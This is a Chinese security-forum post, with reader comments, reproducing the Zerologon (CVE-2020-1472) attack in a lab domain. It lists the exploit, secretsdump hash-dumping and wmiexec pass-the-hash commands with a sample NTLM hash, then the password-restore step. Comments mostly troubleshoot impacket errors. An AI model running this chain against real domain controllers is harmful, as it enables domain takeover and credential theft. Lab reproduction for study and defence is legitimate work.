CVE-2020-1472 复现

2020-09-15 23:07:09 31 14149


攻击机:kali2020      受害者:windows2008
https://github.com/SecuraBV/CVE-2020-1472    poc
https://github.com/dirkjanm/CVE-2020-1472     exp

1、本地搭建一个域环境


2、使用poc验证
既然提示安装东西,那就   pip install -r requirements.txt  ,之后再执行     python3 zerologon_tester.py <主机名> <ip>

3、使用exp攻击,但是这个时候很多人的脚本回报错,是因为缺少 impacket,https://github.com/SecureAuthCorp/impacket  ,python3 setup.py install  //安装impacket,然后执行exp
python3 cve-2020-1472-exploit.py owa 192.168.137.137

4、使用impacket的secretsdump.py导出域控制上的hash
python3 secretsdump.py god.org/owa\[email protected] -no-pass


5、利用获取到的管理员hash来远程操作域控服务器
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/[email protected]





6、获取管理员hash,远程连接导出sam数据库中的原来的计算机hash


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL


7、恢复计算机的hash
下载脚本 https://github.com/risksense/zerologon
python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4     //注意hash的部分,只有后半部分


8、恢复计算机的hash
使用impacket的脚本来登录域控来验证hash
使用7步骤的脚本回复hash前

使用7步骤脚本恢复hash后

关于作者

abc18817440篇文章350篇回复

评论31次

要评论?请先  登录  或  注册
  • 31楼
    2020-10-23 22:51

    学到了,嘻嘻嘻。。。。大佬

  • 30楼
    2020-9-23 07:33

    exp链接里的文件是restorepassword.py,你那是改了名还是压根不是用的这个?

  • 29楼
    2020-9-23 07:28

    from impacket.dcerpc.v5.nrpc import NetrServerPasswordSet2Response, NetrServerPasswordSet2 ImportError: cannot import name 'NetrServerPasswordSet2Response' from 'impacket.dcerpc.v5.nrpc' 一直报错

  • 28楼
    2020-9-21 10:36

    成功是成功了,就是不知道为啥域内的应用都登录不了了,按理说是改的域控本地管理啊

  • 27楼
    2020-9-18 15:34
    TO_OT

    @abc188174 @moimou @Nolan @q1af4n 几位表哥,感觉你们技术比较好,想请教你们两个问题;1.这个漏洞在外网能否利用,打目标机器?2.利用条件,目标必须是域控机器才行吗?如果只是域内成员,但不是域控,还能利用吗?

    1

    有表哥说socks代理可以使用,所以理论来说外网可以使用(域控外网的很少的),其次就是这个漏洞是针是NetLogon 特权提升漏洞,以我的理解这个漏洞是只针对域控,只有域控才会安装NetLogon

  • 26楼
    2020-9-18 10:20

    @abc188174 @moimou @Nolan @q1af4n 几位表哥,感觉你们技术比较好,想请教你们两个问题; 1.这个漏洞在外网能否利用,打目标机器? 2.利用条件,目标必须是域控机器才行吗?如果只是域内成员,但不是域控,还能利用吗?

  • 25楼
    2020-9-17 16:31

    mimikatz刚发的新版已经集成好了

  • 24楼
    2020-9-17 14:38
    ly55521

    exp 的时候执行出错, 已安装 github 的 impacketPerforming authentication attempts...=================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringTraceback (most recent call last): File "cve-2020-1472-exploit.py", line 106, in <module> perform_attack('\\\\' + dc_name, dc_ip, dc_name) File "cve-2020-1472-exploit.py", line 84, in perform_attack result = exploit(dc_handle, rpc_con, target_computer) File "cve-2020-1472-exploit.py", line 57, in exploit request = nrpc.NetrServerPasswordSet2()AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'

    1

    我知道了,我的是要下载后 执行 python3 -m pip install

  • 23楼
    2020-9-17 14:34

    exp 的时候执行出错, 已安装 github 的 impacket Performing authentication attempts... ================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================= Target vulnerable, changing account password to empty string Traceback (most recent call last): File "cve-2020-1472-exploit.py", line 106, in <module> perform_attack('\\\\' + dc_name, dc_ip, dc_name) File "cve-2020-1472-exploit.py", line 84, in perform_attack result = exploit(dc_handle, rpc_con, target_computer) File "cve-2020-1472-exploit.py", line 57, in exploit request = nrpc.NetrServerPasswordSet2() AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'

  • 22楼
    2020-9-17 14:09
    wllhm_27301

    第六步到第八步是要干嘛啊

    1
    abc188174

    恢复原来的hash值,不然随意的改变hash会对域,dns或者一些其他的功能可能造成影响

    2

    还有这个域$用户的口令 我这边怎么解不开啊 我什么时候配置的啊 怎么都不知道 我配的都是弱口令啊 加密方式的问题

  • 21楼
    2020-9-17 12:35
    wllhm_27301

    第六步到第八步是要干嘛啊

    1
    abc188174

    恢复原来的hash值,不然随意的改变hash会对域,dns或者一些其他的功能可能造成影响

    2

    恢复的是“域$”用户的吗 ?

  • 20楼
    2020-9-17 11:26

    最关键的还是impacket需要最新的

  • 19楼
    2020-9-17 08:00
    wllhm_27301

    第六步到第八步是要干嘛啊

    1

    恢复原来的hash值,不然随意的改变hash会对域,dns或者一些其他的功能可能造成影响

  • 18楼
    2020-9-17 00:43

    第六步到第八步是要干嘛啊

  • 17楼
    2020-9-16 16:07
    darker

    第五步连接失败啥原因啊

    1

    会不会是hash选择错了,这个我导出的hash是所有的hash,选择域控的hash才可以连接域控服务器

  • 16楼
    2020-9-16 15:06

    第五步连接失败啥原因啊

  • 15楼
    2020-9-16 14:43

    win server 2012以上可以成功吗?

  • 14楼
    2020-9-16 12:56
    895515845

    装了impacket还一直报错是咋回事呢

    1

    用python3安装,别直接python

  • 13楼
    2020-9-16 12:45
    895515845

    装了impacket还一直报错是咋回事呢

    1

    还有个就是impacket要最新版

  • 12楼
    2020-9-16 12:44
    895515845

    装了impacket还一直报错是咋回事呢

    1

    我遇到一个报错是connect refuce,那是因为被防火墙拦截了,你测试一下端口能通吗,nc -znv ip 139